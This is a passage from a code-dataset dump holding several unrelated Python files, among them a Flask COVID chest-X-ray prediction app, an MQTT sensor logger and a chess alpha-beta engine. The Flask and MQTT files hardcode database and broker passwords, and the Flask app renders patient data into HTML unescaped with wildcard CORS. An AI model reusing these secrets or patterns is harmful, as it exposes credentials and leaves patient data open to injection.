versa.\n\n \"\"\"\n\n def __init__(self, shapes, raveled=None):\n \"\"\"\n Arguments:\n shapes (list): The shapes of the matrices as a list of 2-tuples. Each\n 2-tuple is of the form `(r, c)`, with `r` being the number of rows\n and `c` the number of columns.\n\n raveled (numpy.array, optional): One-dimensional vector of all the\n initial matrix values; the class takes ownership of the array. If\n not specified, the matrices will be zero-initialised.\n\n Raises:\n ValueError: The length of the `raveled` vector does not match the\n number of elements expected by the `shapes` list.\n\n \"\"\"\n\n if raveled is None:\n raveled = numpy.zeros(sum(x * y for x, y in shapes))\n elif sum(x * y for x, y in shapes) != raveled.size:\n raise ValueError('The raveled vector and shapes do not match.')\n\n self._raveled = raveled\n self._shapes = shapes\n self._views = [None] * len(shapes)\n\n for i in range(len(self._views)):\n start = sum(x * y for x, y in shapes[0:i])\n end = start + shapes[i][0] * shapes[i][1]\n self._views[i] = raveled[start:end].reshape(shapes[i])\n\n @property\n def raveled(self):\n return self._raveled\n\n @property\n def shapes(self):\n return self._shapes\n\n def __getitem__(self, key):\n return self._views[key]\n\n def __setitem__(self, key, value):\n self._views[key][:] = value\n\n def __len__(self):\n return len(self._views)\n\n\nclass Samples():\n \"\"\"\n Stores input and target samples to be used during training.\n\n The class offers a convenient way for related input and target arrays to\n be grouped together, while also ensuring that the number of samples in each\n is the same (i.e. both arrays have the same number of columns). 
The two\n arrays will be made immutable by setting `inputs.flags.writeable` and\n `targets.flags.writeable` to `False`.\n\n \"\"\"\n\n def __init__(self, inputs, targets):\n \"\"\"\n Arguments:\n inputs (numpy.array): Array of input samples of size `I`-by-`N`,\n where `I` is the number of input features and `N` is the number\n of samples.\n\n targets (numpy.array): Array of target samples of size `T`-by-`N`,\n where `T` is the number of output features and `N` is the same\n number of samples as for `inputs`.\n\n Raises:\n ValueError: The `inputs` and `targets` arrays have different number\n of samples (different number of columns).\n\n \"\"\"\n\n if inputs.shape[1] != targets.shape[1]:\n raise ValueError('Matrices have different number of samples.')\n\n inputs.flags.writeable = False\n targets.flags.writeable = False\n\n self._inputs = inputs\n self._targets = targets\n\n def __len__(self):\n \"\"\"\n Returns:\n (int): The number of samples\n\n \"\"\"\n assert self.inputs.shape[1] == self.targets.shape[1]\n return self.inputs.shape[1]\n\n @property\n def inputs(self):\n \"\"\" (numpy.array) The input samples array passed at construction \"\"\"\n return self._inputs\n\n @property\n def targets(self):\n \"\"\" (numpy.array) The target samples array passed at construction \"\"\"\n return self._targets\n\n\nclass Datasets():\n \"\"\"\n Holds train, validation and test sets to be used during training. These\n sets, as well as the values they contain, are immutable.\n\n \"\"\"\n\n def __init__(self, train, validation, test):\n \"\"\"\n Arguments:\n train (:class:`.Samples`): Data used during training.\n validation (:class:`.Samples`): Data used for cross-validation.\n test (:class:`.Samples`): Data used for the final test phase.\n\n Raises:\n ValueError: Samples sets cannot be `None` or empty.\n\n \"\"\"\n if None in (train, validation, test):\n raise ValueError('Sample sets cannot be `None`.')\n\n if 0 in (len(train), len(validation), len(test)):\n raise ValueError('Sample sets cannot be empty.')\n\n self._train = train\n self._validation = validation\n self._test = test\n\n @staticmethod\n def partition(inputs, targets, ratios):\n \"\"\"\n Partitions the given data into separate data sets, according to the\n indicated ratios. The arrays will be made immutable by setting their\n `flags.writeable` properties to `False`.\n\n Arguments:\n inputs (numpy.array): Array of input samples of size `I`-by-`N`,\n where `I` is the number of input features and `N` is the number\n of samples.\n\n targets (numpy.array): Array of target samples of size `T`-by-`N`,\n where `T` is the number of output features and `N` is the same\n number of samples as for `inputs`.\n\n ratios (float or int tuple): Tuple of three elements, `(A, B, C)`,\n where `A`, `B`, and `C` are the relative ratios of the train,\n validation, and test samples, respectively. 
None can be 0.\n\n Returns:\n (:class:`.Datasets`): The `Datasets` instance, with data partitioned\n as indicated.\n\n Raises:\n ValueError: The tuple does not have three elements, some of the ratio\n values are 0 or negative, or the `inputs` and `targets` arrays have\n different number of samples.\n\n \"\"\"\n\n if len(ratios) != 3:\n raise ValueError('The ratios argument must be a 3-tuple.')\n\n if any(r <= 0.0 for r in ratios):\n raise ValueError('Ratios must be positive.')\n\n if inputs.shape[1] != targets.shape[1]:\n raise ValueError('Different number of input and train samples.')\n\n inputs.flags.writeable = False\n targets.flags.writeable = False\n\n sizes = numpy.array(ratios)\n sizes = sizes * inputs.shape[1] / numpy.sum(sizes)\n sizes = sizes.astype(int)\n sizes[0] += inputs.shape[1] - numpy.sum(sizes)\n\n assert all(size > 0.0 for size in sizes)\n assert sum(sizes) == inputs.shape[1]\n\n x = inputs\n t = targets\n\n train, x, t = Datasets._take(x, t, sizes[0])\n validation, x, t = Datasets._take(x, t, sizes[1])\n test, _, _ = Datasets._take(x, t, sizes[2])\n\n return Datasets(train, validation, test)\n\n @property\n def train(self):\n \"\"\" (:class:`.Samples`) Train set (immutable and non-empty) \"\"\"\n return self._train\n\n @property\n def validation(self):\n \"\"\" (:class:`.Samples`) Validation set (immutable and non-empty) \"\"\"\n return self._validation\n\n @property\n def test(self):\n \"\"\" (:class:`.Samples`) Test set (immutable and non-empty) \"\"\"\n return self._test\n\n @staticmethod\n def _take(x, t, size):\n # This if-statement is not strictly necessary since numpy.hsplit\n # already handles this corner case, but it also throws a FutureWarning\n # that is not relevant to this code and only distracts.\n if size == x.shape[1]:\n assert x.shape[1] == t.shape[1]\n return Samples(x, t), None, None\n\n x, remaining_x = numpy.hsplit(x, [size])\n t, remaining_t = numpy.hsplit(t, [size])\n return Samples(x, t), remaining_x, remaining_t\n","sub_path":"app/utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":7698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"349979888","text":"import re\nfrom flask import render_template, request, jsonify, make_response\nfrom flask.helpers import url_for\nimport pymongo\nfrom tensorflow.keras.models import load_model\nfrom numpy.core.fromnumeric import reshape, resize\nfrom werkzeug.wrappers import response\nfrom app import app\nimport cv2\nimport numpy as np\nfrom PIL import Image\nimport io\n# import re\nimport base64\nfrom flask_pymongo import PyMongo\nfrom datetime import date, datetime\nfrom bson.objectid import ObjectId\n\napp.config[\"MONGO_URI\"] = \"mongodb+srv://somkarunmongo:phoomteay@cluster0.q3poe.mongodb.net/Chest_X_Ray\"\n\nmongo = PyMongo(app)\ndb = mongo.db\n\nimg_size = 100\n\nmodel = load_model('./model/CXR_COVID2.h5')\n\n\nlabel_dict = {0:'Covid19 Positive', 1: 'Covid19 Negative'}\n\n\ndef preprocess(img):\n img = np.array(img)\n\n if(img.ndim == 3):\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n else:\n gray = img\n\n gray = gray/255\n resized = cv2.resize(gray, (img_size, img_size))\n reshaped = resized.reshape(1, img_size, img_size)\n return reshaped\n\n@app.route('/')\n@app.route('/index')\ndef index():\n return render_template('index.html')\n\n@app.route('/predict', methods=[\"POST\", \"OPTIONS\"])\ndef predict():\n message = request.get_json(force=True)\n encoded = message['image']\n decoded = base64.b64decode(encoded)\n dataBytesIO 
= io.BytesIO(decoded)\n    dataBytesIO.seek(0)\n    # open image\n    image = Image.open(dataBytesIO)\n    # preprocess image for the model\n    test_image = preprocess(image)\n\n    prediction = model.predict(test_image)\n    result = np.argmax(prediction, axis=1)[0]\n    accuracy = float(np.max(prediction, axis=1)[0])*100\n    accuracy = \"%.2f\" % accuracy\n\n    label = label_dict[result]\n\n    response = {\"prediction\": {\"result\": label, \"accuracy\": accuracy}}\n\n    if request.method == \"OPTIONS\": # CORS preflight\n        return _build_cors_preflight_response()\n    elif request.method == \"POST\": # the actual request following the preflight\n        # order = OrderModel.creator(....)\n        return _corsify_actual_response(jsonify(response))\n    else:\n        raise RuntimeError(\"Weird - don't know how to handle method {}\".format(request.method))\n\n\ndef _build_cors_preflight_response():\n    response = make_response()\n    response.headers.add(\"Access-Control-Allow-Origin\", \"*\")\n    response.headers.add('Access-Control-Allow-Headers', \"*\")\n    response.headers.add('Access-Control-Allow-Methods', \"*\")\n    return response\n\ndef _corsify_actual_response(response):\n    response.headers.add(\"Access-Control-Allow-Origin\", \"*\")\n    return response\n\n@app.route('/save_data', methods=[\"POST\", \"OPTIONS\"])\ndef save_data():\n    namev = request.form.get('paname')\n    surnamev = request.form.get('surname')\n    sexv = request.form.get('sex')\n    yobv = str(request.form.get('YOB'))\n    ts = datetime.now()\n    atkv = request.form.get('atk')\n    atk_datev = request.form.get('atk_date')\n    pcrv = request.form.get('pcr')\n    pcr_datev = request.form.get('pcr_date')\n\n    predict_ = request.form.get('fpredict')\n    probability_ = request.form.get('fprobability')\n\n    if 'img' in request.files:\n        profile_image = request.files['img']\n        mongo.save_file(profile_image.filename, profile_image)\n        mongo.db.users.insert({\n            'username': namev, 'surname': surnamev, 'sex': sexv, 'yob': yobv, 'predict': predict_, 'probability': probability_,\n            'save_date': ts, 'profile_image_name': profile_image.filename,\n            'atk': atkv, 'atk_date': atk_datev, 'pcr': pcrv, 'pcr_date': pcr_datev\n        })\n\n    return render_template('cxrlist.html')\n\n@app.route('/file/<filename>')\ndef file(filename):\n    return mongo.send_file(filename)\n\n\n@app.route('/profile/<username>')\ndef profile(username):\n    user = mongo.db.users.find_one_or_404({'username': username})\n    surname = user['surname']\n    sex = user['sex']\n    yob = user['yob']\n    predict = user['predict']\n    save_date = user['save_date']\n    return f'''\n
    <p>ชื่อ: {username} นามสกุล: {surname}</p>\n    <p>เพศ: {sex}</p>\n    <p>ปีเกิด: {yob}</p>\n    <p>วันที่บันทึก: {save_date}</p>\n    <p>คาดการณ์: {predict}</p>\n    <p>โอกาส(%): {probability}</p>
\n \n    '''\n\n@app.route('/showdetail/<_id>')\ndef showdetail(_id):\n\n    user = mongo.db.users.find_one_or_404({'_id': ObjectId(_id)})\n    username = user['username']\n    surname = user['surname']\n    sex = user['sex']\n    yob = user['yob']\n    predict = user['predict']\n    atk = user['atk']\n    pcr = user['pcr']\n    profile_image_name = user['profile_image_name']\n    probability = user['probability']\n    save_date = user['save_date']\n    return f'''\n\n    <a href=\"{url_for('index')}\">กลับหน้าแรก</a>\n    <a href=\"{url_for('cxrlist')}\">ค้นหาข้อมูล</a>\n\n
    <p>-----------------------------------------------------------------</p>\n\n    <p>ชื่อ: {username} นามสกุล: {surname}</p>\n    <p>เพศ: {sex}</p>\n    <p>ปีเกิด: {yob}</p>\n    <p>วันที่บันทึก: {save_date}</p>\n    <p>คาดการณ์: {predict}</p>\n    <p>โอกาส(%): {probability}</p>\n    <p>ATK: {atk}</p>\n    <p>RT-PCR: {pcr}</p>
\n \n '''\n\n@app.route('/cxrlist')\ndef cxrlist():\n return render_template('cxrlist.html')\n\n@app.route('/manual')\ndef manual():\n return render_template('manual.html')\n\n@app.route('/findpatient', methods=[\"POST\", \"OPTIOBNS\"])\ndef findpatient():\n rname = request.form.get('rname')\n \n cxr_lists = db.users.find({'username':rname}).sort([('username', pymongo.ASCENDING),('surname', pymongo.ASCENDING), ('save_date', pymongo.ASCENDING)])\n clists = []\n sumclists = []\n vsurname = \"\"\n for cxr_list in cxr_lists:\n \n clists.append(cxr_list)\n if vsurname != cxr_list['surname']:\n sumclists.append({'username': cxr_list['username'], 'surname': cxr_list['surname']})\n\n vsurname = cxr_list['surname']\n\n \n return render_template('cxrshow.html', clists=clists, sumclists=sumclists)\n","sub_path":"app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":6395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"532139254","text":"import argparse\nfrom solvers import train_init,train, train_distill\nfrom gaussian_uniform.weighted_pseudo_list import make_weighted_pseudo_list\nimport copy\nimport torch\nimport os\nimport shutil\nimport time\n\ndef main(args):\n args.log_file.write('\\n\\n########### initialization ############')\n \n # initializing\n acc, model = train_init(args)\n\n # acc = 0\n # model = torch.load(os.path.join(args.save_dir, 'initial_model.pk'))\n \n best_acc = acc\n best_model = copy.deepcopy(model)\n\n for stage in range(args.stages):\n \n print('\\n\\n########### stage : {:d}th ##############\\n\\n'.format(stage))\n args.log_file.write('\\n\\n########### stage : {:d}th ##############'.format(stage))\n \n #updating parameters of gaussian-uniform mixture model with fixed network parameters,the updated pseudo labels and \n #posterior probability of correct labeling is listed in folder \"./data/office(dataset name)/pseudo_list\"\n # make_weighted_pseudo_list(args, model)\n \n #updating network parameters with fixed gussian-uniform mixture model and pseudo labels\n acc,model = train_distill(best_model, args)\n # acc,model = train(args)\n \n if acc > best_acc:\n best_acc = acc\n best_model = copy.deepcopy(model)\n \n # torch.save(best_model,'snapshot/save/final_best_model.pk')\n print('final_best_acc:{:.4f}'.format(best_acc))\n return best_acc,best_model\n\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Spherical Space Domain Adaptation with Pseudo-label Loss')\n parser.add_argument('--baseline', type=str, default='MSTN', choices=['MSTN', 'DANN'])\n parser.add_argument('--gpu_id', type=str, nargs='?', default='0', help=\"device id to run\")\n parser.add_argument('--dataset',type=str,default='office')\n parser.add_argument('--source', type=str, default='amazon')\n parser.add_argument('--target',type=str,default='dslr')\n parser.add_argument('--source_list', type=str, default='data/office/amazon_list.txt', help=\"The source dataset path list\")\n parser.add_argument('--target_list', type=str, default='data/office/dslr_list.txt', help=\"The target dataset path list\")\n parser.add_argument('--test_interval', type=int, default=100, help=\"interval of two continuous test phase\")\n parser.add_argument('--snapshot_interval', type=int, default=1000, help=\"interval of two continuous output model\")\n parser.add_argument('--output_dir', type=str, default='san', help=\"output directory of our model (in ../snapshot directory)\")\n parser.add_argument('--lr', type=float, 
default=0.001, help=\"learning rate\")\n parser.add_argument('--num_class',type=int,default=31,help='the number of classes')\n parser.add_argument('--stages',type=int,default=0,help='the number of alternative iteration stages')\n parser.add_argument('--max_iter',type=int,default=5000)\n parser.add_argument('--batch_size',type=int,default=36)\n parser.add_argument('--mosaic_1',type=int,default=2)\n parser.add_argument('--mosaic_2',type=int,default=4)\n parser.add_argument('--lambda_e',type=float,default=0.1)\n parser.add_argument('--lambda_c',type=float,default=0.3)\n parser.add_argument('--log_file')\n args = parser.parse_args()\n\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = args.gpu_id\n save_dir = args.dataset + '_' + args.baseline + '_'+ args.output_dir\n save_dir = 'snapshot/{}/{}'.format(args.dataset, save_dir)\n # if os.path.exists(save_dir):\n # shutil.rmtree(save_dir)\n if not os.path.exists(save_dir):\n os.makedirs(save_dir)\n log_file = open('{}/log.txt'.format(save_dir),'w')\n log_file.write('dataset:{}\\tsource:{}\\ttarget:{}\\n\\n'\n ''.format(args.dataset,args.source,args.target))\n args.log_file = log_file\n \n \n args.save_dir = save_dir\n print(args.save_dir)\n txt_dict = {'webcam': './data/list/office/webcam_list.txt', \n 'amazon': './data/list/office/amazon_list.txt', \n 'dslr':'./data/list/office/dslr_list.txt', \n 'train':'./data/list/visda-2017/train_list.txt', \n 'validation':'./data/list/visda-2017/validation_list.txt', \n 'art':'./data/list/office-home/Art.txt',\n 'clipart':'./data/list/office-home/Clipart.txt', \n 'product':'./data/list/office-home/Product.txt', \n 'real_world':'./data/list/office-home/Real_World.txt',\n 'i': './data/list/image-clef/i_list.txt',\n 'p': './data/list/image-clef/p_list.txt',\n 'c': './data/list/image-clef/c_list.txt',\n }\n num_class_dict = {'office-home':65, 'office':31,'visda2017':12, 'image-clef':12}\n\n args.num_class = num_class_dict[args.dataset]\n args.source_list = txt_dict[args.source]\n args.target_list = txt_dict[args.target]\n print('source dataset : {}'.format(args.source_list))\n print('target dataset : {}'.format(args.target_list))\n\n with open('{}/args.txt'.format(save_dir),'w') as f:\n for eachArg, value in args.__dict__.items():\n f.writelines(eachArg + ' : ' + str(value) + '\\n')\n\n main(args)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"276111548","text":"from torchtext import vocab, data\nimport numpy as np\nfrom niklib.utils import pad_sequences\n#from torchtext.datasets import language_modeling\n#from spacy import spacy\n# Download spacy package if does not have\n#!python -m spacy download en\nimport string\nimport re\nfrom falib.text import Tokenizer\n\nclass TextProcessor(object):\n \n def __init__(self, w2v, tokenize_fn=None, max_pad=50):\n self.w2v, self.tokenize_fn, self.max_pad = w2v, tokenize_fn, max_pad\n self.re_tok = re.compile(f'([{string.punctuation}“”¨«»®´·º½¾¿¡§£₤‘’])')\n self.fastai_tok = Tokenizer()\n if tokenize_fn is None:\n TEXT = data.Field(lower=True, tokenize=self.tokenize)\n self.tokenize_fn = TEXT.preprocess\n\n def text2features(self, texts):\n if isinstance(texts, str): texts = [texts]\n tk_texts = [self.tokenize_fn(txt) for txt in texts]\n lens = np.array([len(txt) for txt in tk_texts])\n minl, maxl, meanl = lens.min(), lens.max(), lens.mean()\n print(f'Text length: min={minl}, max={maxl}, mean={meanl}')\n print(f'Padding all text to have 
fixed length = {self.max_pad}')\n \n xs = [[self.w2v.word2idx(word) for word in txt if self.w2v.word2idx(word) > 0] for txt in tk_texts]\n xs = pad_sequences(xs, maxlen=self.max_pad, padding='pre', truncating='post')\n xs = np.asarray(xs)\n return xs\n \n def __repr__(self):\n summary = f'Tokenize function: {self.tokenize_fn.__name__} \\n' \n summary += f'Max zero-padding len: {self.max_pad} \\n'\n return summary\n \n def split_by_punctuation(self, s): return self.re_tok.sub(r' ', s).split()\n\n def split_by_popularity(self, word):\n unknown_pop_score = self.w2v.n_vocabs\n if self.w2v.word2idx(word) > 0:\n return self.w2v.word2idx(word), [word]\n\n if len(word)<=5:\n return unknown_pop_score, [word]\n\n if (word.replace('.','',1).replace(',','',1).isdigit()):\n return unknown_pop_score, [word] # Don't care about digit\n\n best_pop_score = unknown_pop_score\n best_split = None\n best_nsplit = 3 # Max split to split\n for i_cut in range(len(word)-2, 1, -1):\n prefix, core = word[:i_cut], word[i_cut:]\n\n if self.w2v.word2idx(core) < 0:\n continue\n core_score = self.w2v.word2idx(core)\n\n if self.w2v.word2idx(prefix) < 0:\n prefix_score, prefix = self.split_by_popularity(prefix)\n else:\n prefix_score, prefix = self.w2v.word2idx(prefix), [prefix] \n if (prefix_score >= unknown_pop_score): # Don't split if all splitted words are good\n continue\n pop_score = prefix_score + core_score\n words = prefix; words.append(core)\n\n if len(words) > best_nsplit: continue # Don't split more than best_nsplit\n if (len(words) < best_nsplit) or (pop_score < best_pop_score):\n #print(prefix, prefix_score, core_score, pop_score)\n best_split = words\n best_nsplit= len(words)\n best_pop_score = pop_score\n\n if best_split is None:\n return (unknown_pop_score, [word])\n else:\n return (best_pop_score, best_split)\n\n # TODO: Add new word to w2v with random vector if can't split well\n # TODO: Remove unpopular words from w2v, add special token for numbers or irrelevant words\n \n def tokenize(self, text):\n t = self.fastai_tok.spacy_tok(text)\n new_t = []\n for word in t:\n new_t.extend(self.split_by_punctuation(word))\n t = new_t\n new_t = []\n for word in t:\n word = word.lower()\n pop_score, words = self.split_by_popularity(word)\n new_t.extend(words)\n #if self.w2v.word2idx(word) < 0:\n # print(words)\n return new_t\n\n","sub_path":"courses/nik/niklib/processor_text.py","file_name":"processor_text.py","file_ext":"py","file_size_in_byte":3968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"353130057","text":"import paho.mqtt.client as mqtt\nimport json\nimport sqlite3\nfrom pprint import pprint # makes data more pretty\n\n# broker = \"46.101.13.195\" # this is our cloud server used to isolate any issues with opensenors which is more complex\nbroker = \"mqtt.opensensors.io\"\nDB_Name = \"airwatchData.db\"\nglobal cursor\n## this section is based on code from https://eclipse.org/paho/clients/python\n\n# The callback for when the client receives a CONNACK response from the server.\ndef on_connect(client, userdata, rc):\n print(\"Connected with result code \"+str(rc))\n # Subscribing in on_connect() means that if we lose the connection and\n # reconnect then subscriptions will be renewed.\n client.subscribe(\"/orgs/solentairwatch/sniffy\", qos=0)\n \n\n# The callback for when a PUBLISH message is received from the server.\ndef on_message(client, userdata, msg):\n data = json.loads(msg.payload.decode('utf-8'))\n pprint(data)\n # parse the data to the sql 
database, prob a way to do directly from JSON, this works though\n cursor.execute('''INSERT INTO sniffy(id, timestmp, latitude, longitude, PM10, PM25, PM1)\n VALUES(?,?,?,?,?,?,?)''', (data[\"id\"], data[\"time\"], data[\"latitude\"], data[\"longitude\"], data[\"PM10\"], data[\"PM25\"], data[\"PM1\"]))\n db.commit()\n \nclient = mqtt.Client(client_id=\"6423\")\nclient.username_pw_set(\"solentairwatch\", password=\"aLmgqJPH\")\n\n# set call back functions\nclient.on_connect = on_connect\nclient.on_message = on_message\n\n# set up database connection\ndb = sqlite3.connect(DB_Name)\ncursor = db.cursor()\ncursor.execute('''\n CREATE TABLE IF NOT EXISTS sniffy(id TEXT, timestmp TEXT,\n latitude TEXT, longitude TEXT, PM10 TEXT, PM25 TEXT, PM1 TEXT)\n''')\n\n# (address, port, timeout (sec) )\nclient.connect(broker)\n\n# Blocking call that processes network traffic, dispatches callbacks and\n# handles reconnecting.\n# Other loop*() functions are available that give a threaded interface and a\n# manual interface.\nclient.loop_forever()\n\n\ndb.close() # this will never be executed because of the forever loop - need some exit logic\n","sub_path":"mqtt/subscribeMQTT.py","file_name":"subscribeMQTT.py","file_ext":"py","file_size_in_byte":2094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"195973789","text":"from itertools import groupby\nfrom copy import deepcopy\n\nimport pieces\nimport re\n\nclass ChessError(Exception): pass\nclass InvalidCoord(ChessError): pass\nclass InvalidColor(ChessError): pass\nclass InvalidMove(ChessError): pass\nclass Check(ChessError): pass\nclass CheckMate(ChessError): pass\nclass Draw(ChessError): pass\nclass NotYourTurn(ChessError): pass\n\nFEN_STARTING = 'rnbqkbnr/pppppppp/8/8/8/8/PPPPPPPP/RNBQKBNR w KQkq - 0 1'\nRANK_REGEX = re.compile(r\"^[A-Z][1-8]$\")\n\nclass Board(dict):\n '''\n Board\n\n A simple chessboard class\n\n TODO:\n\n * PGN export\n * En passant\n * Castling\n * Promoting pawns\n * Fifty-move rule\n '''\n pawns = [[0, 0, 0, 0, 0, 0, 0, 0,],\n [50, 50, 50, 50, 50, 50, 50, 50,],\n [10, 10, 20, 30, 30, 20, 10, 10,],\n [5, 5, 10, 25, 25, 10, 5, 5,],\n [0, 0, 0, 20, 20, 0, 0, 0,],\n [5, -5,-10, 0, 0,-10, -5, 5,],\n [5, 10, 10,-20,-20, 10, 10, 5,],\n [0, 0, 0, 0, 0, 0, 0, 0]]\n\n knights =[[-50,-40,-30,-30,-30,-30,-40,-50,],\n [-40,-20, 0, 0, 0, 0,-20,-40,],\n [-30, 0, 10, 15, 15, 10, 0,-30,],\n [-30, 5, 15, 20, 20, 15, 5,-30,],\n [-30, 0, 15, 20, 20, 15, 0,-30,],\n [-30, 5, 10, 15, 15, 10, 5,-30,],\n [-40,-20, 0, 5, 5, 0,-20,-40,],\n [-50,-40,-30,-30,-30,-30,-40,-50,]]\n\n bishops =[[-20,-10,-10,-10,-10,-10,-10,-20,],\n [-10, 0, 0, 0, 0, 0, 0,-10,],\n [-10, 0, 5, 10, 10, 5, 0,-10,],\n [-10, 5, 5, 10, 10, 5, 5,-10,],\n [-10, 0, 10, 10, 10, 10, 0,-10,],\n [-10, 10, 10, 10, 10, 10, 10,-10,],\n [-10, 5, 0, 0, 0, 0, 5,-10,],\n [-20,-10,-10,-10,-10,-10,-10,-20,]]\n\n rooks = [[ 0, 0, 0, 0, 0, 0, 0, 0,],\n [5, 10, 10, 10, 10, 10, 10, 5,],\n [-5, 0, 0, 0, 0, 0, 0, -5,],\n [-5, 0, 0, 0, 0, 0, 0, -5,],\n [-5, 0, 0, 0, 0, 0, 0, -5,],\n [-5, 0, 0, 0, 0, 0, 0, -5,],\n [-5, 0, 0, 0, 0, 0, 0, -5,],\n [0, 0, 0, 5, 5, 0, 0, 0]]\n\n\n queens = [[-20,-10,-10, -5, -5,-10,-10,-20,],\n [-10, 0, 0, 0, 0, 0, 0,-10,],\n [-10, 0, 5, 5, 5, 5, 0,-10,],\n [ -5, 0, 5, 5, 5, 5, 0, -5,],\n [ 0, 0, 5, 5, 5, 5, 0, -5,],\n [-10, 5, 5, 5, 5, 5, 0,-10,],\n [-10, 0, 5, 0, 0, 0, 0,-10,],\n [-20,-10,-10, -5, -5,-10,-10,-20]]\n\n kings = [[30,-40,-40,-50,-50,-40,-40,-30,],\n [-30,-40,-40,-50,-50,-40,-40,-30,],\n 
[-30,-40,-40,-50,-50,-40,-40,-30,],\n [-30,-40,-40,-50,-50,-40,-40,-30,],\n [-20,-30,-30,-40,-40,-30,-30,-20,],\n [-10,-20,-20,-20,-20,-20,-20,-10,],\n [20, 20, 0, 0, 0, 0, 20, 20,],\n [20, 30, 10, 0, 0, 10, 30, 20]]\n\n\n\n\n axis_y = ('A', 'B', 'C', 'D', 'E', 'F', 'G', 'H')\n axis_x = tuple(range(1,9)) # (1,2,3,...8)\n\n captured_pieces = { 'white': [], 'black': [] }\n player_turn = None\n castling = '-'\n en_passant = '-'\n halfmove_clock = 0\n fullmove_number = 1\n history = []\n\n def __init__(self, fen = None):\n if fen is None: self.load(FEN_STARTING)\n else: self.load(fen)\n\n def __getitem__(self, coord):\n if isinstance(coord, str):\n coord = coord.upper()\n if not re.match(RANK_REGEX, coord.upper()): raise KeyError\n elif isinstance(coord, tuple):\n coord = self.letter_notation(coord)\n try:\n return super(Board, self).__getitem__(coord)\n except KeyError:\n return None\n\n def save_to_file(self): pass\n\n def is_in_check_after_move(self, p1, p2):\n # Create a temporary board\n tmp = deepcopy(self)\n tmp._do_move(p1,p2)\n return tmp.is_in_check(self[p1].color)\n\n\n def computer_move(self,color):\n\n if(color not in (\"black\", \"white\")): raise InvalidColor\n\n [action,value] = self.alphaBeta(-1000000,+1000000,3,color)\n p1 = action[0] #initial position\n p2 = action[1] #final position\n self.move(p1,p2) \n\n\n def evaluate(self,color):\n val = 0\n antival = 0\n mobility = 0\n sqval = 0\n sqantival = 0\n\n color = \"black\"\n enemy = self.get_enemy(color)\n for coord in self.keys():\n if (self[coord] is not None) and self[coord].color == color: \n val += self[coord].weight\n if self[coord].abbriviation=='p':\n t1 = ord(coord[0])-65\n t2 = 8 - int(coord[1])\n sqval+= self.pawns[t1][t2]\n elif self[coord].abbriviation=='n':\n t1 = ord(coord[0])-65\n t2 = 8 - int(coord[1])\n sqval+=self.knights[t1][t2]\n elif self[coord].abbriviation=='r':\n t1 = ord(coord[0])-65\n t2 = 8 - int(coord[1])\n sqval+=self.rooks[t1][t2]\n elif self[coord].abbriviation=='b':\n t1 = ord(coord[0])-65\n t2 = 8 - int(coord[1])\n sqval+=self.bishops[t1][t2]\n elif self[coord].abbriviation=='q':\n t1 = ord(coord[0])-65\n t2 = 8 - int(coord[1])\n sqval+=self.queens[t1][t2]\n elif self[coord].abbriviation=='k':\n t1 = ord(coord[0])-65\n t2 = 8 - int(coord[1])\n sqval+=self.kings[t1][t2]\n\n if (self[coord] is not None) and self[coord].color == enemy: \n antival += self[coord].weight \n #if self[coord].abbriviation=='p':\n # sqantival+=1 \n #elif self[coord].abbriviation=='n':\n # sqantival+=1\n #elif self[coord].abbriviation=='r':\n # sqantival+=1\n #elif self[coord].abbriviation=='b':\n # sqantival+=1\n #elif self[coord].abbriviation=='q':\n # sqantival+=1\n #elif self[coord].abbriviation=='k':\n # sqantival+= 1 \n #mobility += len(self.all_possible_moves(color))\n\n return (val-antival)+sqval \n\n\n\n def evaluate2(self,color):\n val = 0\n antival = 0\n mobility = 0\n\n\n\n color = \"black\"\n enemy = self.get_enemy(color)\n for coord in self.keys():\n if (self[coord] is not None) and self[coord].color == color: \n val += self[coord].weight\n if (self[coord] is not None) and self[coord].color == enemy: \n antival += self[coord].weight \n #mobility += len(self.all_possible_moves(color))\n\n\n return val-antival \n\n def alphaBeta(self,alpha,beta,depthleft,color):\n if (depthleft == 0):\n if(color == \"black\"):\n return [[], self.evaluate(color)]\n else:\n return [[], -self.evaluate(color)] \n\n enemy = self.get_enemy(color)\n\n actions = []\n for coord in self.keys():\n if (self[coord] is not None) and 
self[coord].color == color:\n moves = self[coord].possible_moves(coord)\n for move in moves:\n actions.append([coord,move])\n\n bestAction = []\n bestscore = -1000000\n for action in actions:\n temp = deepcopy(self)\n p1 = action[0]\n p2 = action[1]\n temp._do_move(p1,p2)\n #self._do_move(p1,p2)\n tt = temp.alphaBetaMin(-beta,-alpha,depthleft - 1,enemy)\n #tt = self.alphaBetaMin(alpha,beta,depthleft - 1,enemy)\n score = -tt[1]\n #[[],score] = self.alphaBetaMin(alpha,beta,depthleft - 1,enemy)\n #self._undo_move(p1,p2)\n\n if score >= beta: #fail-hard beta-cutoff\n return [action,score]\n\n if score > bestscore: #alpha acts like max in minimax\n bestscore = score\n bestAction = action\n\n if score > alpha:\n alpha = score \n \n return[bestAction,bestscore] \n\n\n\n def alphaBetaMax(self,alpha,beta,depthleft,color):\n if depthleft == 0:\n return [[], self.evaluate(color)]\n\n enemy = self.get_enemy(color)\n \n\n actions = []\n for coord in self.keys():\n if (self[coord] is not None) and self[coord].color == color:\n moves = self[coord].possible_moves(coord)\n for move in moves:\n actions.append([coord,move])\n\n bestAction = []\n for action in actions:\n temp = deepcopy(self)\n p1 = action[0]\n p2 = action[1]\n temp._do_move(p1,p2)\n #self._do_move(p1,p2)\n tt = temp.alphaBetaMin(alpha,beta,depthleft - 1,enemy)\n #tt = self.alphaBetaMin(alpha,beta,depthleft - 1,enemy)\n score = tt[1]\n #[[],score] = self.alphaBetaMin(alpha,beta,depthleft - 1,enemy)\n #self._undo_move(p1,p2)\n\n if score >= beta: #fail-hard beta-cutoff\n return 